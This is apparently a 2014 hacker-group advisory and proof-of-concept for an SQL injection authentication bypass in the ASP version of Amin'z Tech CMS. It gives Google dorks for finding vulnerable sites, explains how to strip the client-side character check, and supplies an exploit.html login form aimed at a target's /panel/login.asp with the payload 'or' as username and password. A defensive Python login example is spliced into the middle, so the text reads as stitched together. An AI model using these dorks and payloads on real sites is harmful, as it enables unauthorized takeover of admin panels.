Thursday, 11 September 2014

Amin'z Tech CMS (asp) - Security bypassed & Auth bypass PoC Exploit


~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[+] Author : KnocKout
[~] Contact(onlymail) : knockout@e-mail.com.tr
[~] HomePage : http://Cyber-Warrior.Org - http://h4x0resec.blogspot.com
############################################################
                 Turkey Security Group
                 'h4x0re SECURITY'                      
###########################################################
~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|~Web App. : Amin'z Tech CMS
|~Affected Version : ASP
|~Official Web: http://www.aminztech.com/
|~RISK : High
|~Google Keyword/Dorks :
"Developer by Amin' z Tech"
"Desgined By: Amin'z Tech" inurl:asp
|~Tested On : Kali Linux \ Windows XP
########################################################
####################INFO################################
The ASP version of the script is affected.
SQL queries can be sent to "panel/login.asp",
but there is a small problem....

The "/panel/" source code has a simple security check;
it does not accept special characters:
----------------------
...
Line 17: var iChars = "!@#$%^&*()+=-[]\\\';,./{}|\":<>?";


  for (var i = 0; i < document.form2.uname.value.length; i++) {
 
  if (iChars.indexOf(document.form2.uname.value.charAt(i)) != -1) {
  alert ("Your Username has special characters. \nThese are not allowed.\n Please remove them and try again.");
  return false;
..
..
-----------------
We remove this check and can then easily run SQL queries.
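
A server-side counterpart to the check above, as an added example that is not code from this advisory or from the CMS: the character filter is enforced where the browser cannot remove it, and the lookup uses a bound parameter. The `admins` table, the SQLite database standing in for the CMS backend, and all function names are assumptions.

```python
import hashlib
import hmac
import os
import sqlite3

# Same characters the page's client-side script rejects, now enforced on the server.
FORBIDDEN = set("!@#$%^&*()+=-[]\\';,./{}|\":<>?")


def hash_password(password: str, salt: bytes) -> bytes:
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)


def make_db() -> sqlite3.Connection:
    """Constructed sample data: one admin account in an in-memory database."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE admins (uname TEXT PRIMARY KEY, salt BLOB, pw_hash BLOB)")
    salt = os.urandom(16)
    db.execute("INSERT INTO admins VALUES (?, ?, ?)",
               ("admin", salt, hash_password("correct horse", salt)))
    return db


def valid_username(uname: str) -> bool:
    """Server-side copy of the check; a request that skips the form still hits it."""
    return 0 < len(uname) <= 64 and not (set(uname) & FORBIDDEN)


def login(db: sqlite3.Connection, uname: str, password: str, validate: bool = True) -> bool:
    if validate and not valid_username(uname):
        return False
    # Bound parameter: the driver sends uname as data, never as SQL text,
    # so quotes in it cannot change the query even if validation is skipped.
    row = db.execute("SELECT salt, pw_hash FROM admins WHERE uname = ?", (uname,)).fetchone()
    if row is None:
        return False
    salt, pw_hash = row
    return hmac.compare_digest(hash_password(password, salt), pw_hash)


if __name__ == "__main__":
    db = make_db()
    print(login(db, "admin", "correct horse"))          # legitimate login
    print(login(db, "'or'", "'or'"))                    # rejected by the server-side check
    print(login(db, "'or'", "'or'", validate=False))    # still no match: input stays data
```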
########################################################
####################Usage Exploit########################

Exploitation
Edit exploit.html to set the target website..
Open exploit.html in your browser..
Username : 'or'
Password : 'or'

GO TO ADMIN PANEL..
############################################################
Example affected sites & Tested on:

==============================================================================00
Admin Panel Security bypassed & auth bypass PoC ; exploit.html
==============================================================================00

<body leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">
<table width="100%" height="100%" border="0" cellpadding="0" cellspacing="0">
  <tr>
    <td>&nbsp;</td>
    <td width="700" align="center"><form name="form2" id="form2" method="post" action="http://[TARGET]/panel/login.asp" onSubmit="return checkform();">
        <table width="400" height="200" border="0" cellpadding="0" cellspacing="0">
          <tr align="center">
            <td height="30" colspan="3"><strong>Login Infromation</strong></td>
          </tr>
          <tr>
            <td width="93">&nbsp;</td>
            <td width="92">User Name:</td>
            <td width="215" height="26"> <input name="uname" type="text" class="textbox" id="uname"></td>
          </tr>
          <tr>
            <td>&nbsp;</td>
            <td>Password:</td>
            <td height="26"> <input name="pass" type="password" class="textbox" id="pass">
            </td>
          </tr>
          <tr>
            <td>&nbsp;</td>
            <td>&nbsp;</td>
            <td height="30"> <input name="Submit" type="submit" class="btn" value="Login">
            </td>
          </tr>
          <tr align="center" valign="top">
            <td colspan="3" class="error"></td>
          </tr>
        </table>
      </form></td>
    <td>&nbsp;</td>
  </tr>
</table>
</body>
</html>

